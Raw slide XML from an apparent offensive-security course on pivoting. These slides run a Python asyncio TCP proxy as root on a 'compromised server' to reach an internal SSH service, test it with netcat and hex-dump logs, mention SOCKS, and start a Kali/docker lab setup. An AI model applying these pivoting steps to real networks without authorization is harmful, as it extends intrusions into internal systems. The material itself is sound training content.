              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4EC9B0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KeyboardInterrupt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pass</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Close the server</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server.close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loop.run_until_complete</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server.wait_closed</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loop.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>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__name__</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"__main__"</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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6632FA-707F-4153-8FA2-C2CE3FC0B3B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33345322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67882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If we run this on the compromised server</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57133" y="2221104"/>
            <a:ext cx="9372047" cy="46166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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp</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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># python async_tcp_proxy.py -p 1234 -r 172.16.238.11 -t 22 -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serving on ('0.0.0.0', 1234)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09C245F-2483-43E1-B97B-5E178A36E565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957133" y="3317651"/>
            <a:ext cx="9372047" cy="101566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nc</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vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.100 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UNKNOWN) [172.16.238.100] 1234 (?) open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hello there!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invalid SSH identification string.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDC3082-E390-440A-BB86-0A76ED8207BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="2729254"/>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will try to connect to the target server/port using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and send some data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568AD98D-E2F9-4CE8-969D-646768FE4E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="4289079"/>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notice that our proxy works perfectly even though we cannot connect to the target directly!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84F1425D-5766-43AC-8384-81A8755480B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957132" y="4797828"/>
            <a:ext cx="9372047" cy="195438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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># python async_tcp_proxy.py -p 1234 -r 172.16.238.11 -t 22 -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serving on ('0.0.0.0', 1234)</a:t>
            </a:r>
          </a:p>
          <a:p>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Receiving 41 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000: 53 53 48 2D 32 2E 30 2D 4F 70 65 6E 53 53 48 5F   SSH-2.0-OpenSSH_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0010: 38 2E 32 70 31 20 55 62 75 6E 74 75 2D 34 75 62   8.2p1 Ubuntu-4ub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0020: 75 6E 74 75 30 2E 33 0D 0A                        untu0.3..</a:t>
            </a:r>
          </a:p>
          <a:p>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Sending 13 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000: 68 65 6C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 6F 20 74 68 65 72 65 21 0A            hello there!.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11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FD90D5EF-E1C4-46BC-91C3-9CFB8BFAB624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741184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678822"/>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If we run this on the compromised server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{766E5801-6FB5-4F20-8936-FDC6AE8586E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957133" y="2221104"/>
            <a:ext cx="9372047" cy="46166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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp</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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># python async_tcp_proxy.py -p 1234 -r 172.16.238.11 -t 22 -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serving on ('0.0.0.0', 1234)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A09C245F-2483-43E1-B97B-5E178A36E565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957133" y="3317651"/>
            <a:ext cx="9372047" cy="101566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nc</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vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 172.16.238.100 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UNKNOWN) [172.16.238.100] 1234 (?) open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hello there!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invalid SSH identification string.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADDC3082-E390-440A-BB86-0A76ED8207BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="2729254"/>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will try to connect to the target server/port using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and send some data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568AD98D-E2F9-4CE8-969D-646768FE4E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="4289079"/>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We notice that our proxy works perfectly even though we cannot connect to the target directly!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84F1425D-5766-43AC-8384-81A8755480B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957132" y="4797828"/>
            <a:ext cx="9372047" cy="195438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err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root@pcpapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># python async_tcp_proxy.py -p 1234 -r 172.16.238.11 -t 22 -v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Serving on ('0.0.0.0', 1234)</a:t>
            </a:r>
          </a:p>
          <a:p>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Receiving 41 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000: 53 53 48 2D 32 2E 30 2D 4F 70 65 6E 53 53 48 5F   SSH-2.0-OpenSSH_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0010: 38 2E 32 70 31 20 55 62 75 6E 74 75 2D 34 75 62   8.2p1 Ubuntu-4ub</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0020: 75 6E 74 75 30 2E 33 0D 0A                        untu0.3..</a:t>
            </a:r>
          </a:p>
          <a:p>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Sending 13 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000: 68 65 6C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 6F 20 74 68 65 72 65 21 0A            hello there!.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="11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B820D540-D407-4AAA-8735-7965C5EE9EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3342807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Writing a TCP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This will work well if there’s one service you’d like to proxy on the internal network, but what if there’re multiple services/targets that you would like to proxy?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568AD98D-E2F9-4CE8-969D-646768FE4E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="3179668"/>
            <a:ext cx="10205840" cy="4986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It wouldn’t make sense to proxy each port to each service individually.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{481E63CB-63E0-4730-8DBE-A90D7FA6DD7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="4434962"/>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One way to go is use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SOCKS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58AB3F25-86F3-41AF-BD0B-0AC9B3580E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22153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742654" y="1142056"/>
            <a:ext cx="8533693" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Setting up the environment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1172177" y="2007893"/>
            <a:ext cx="10213707"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Kali Linux is installed and ready, you can move on and start setting up the lab.</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download &amp; install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
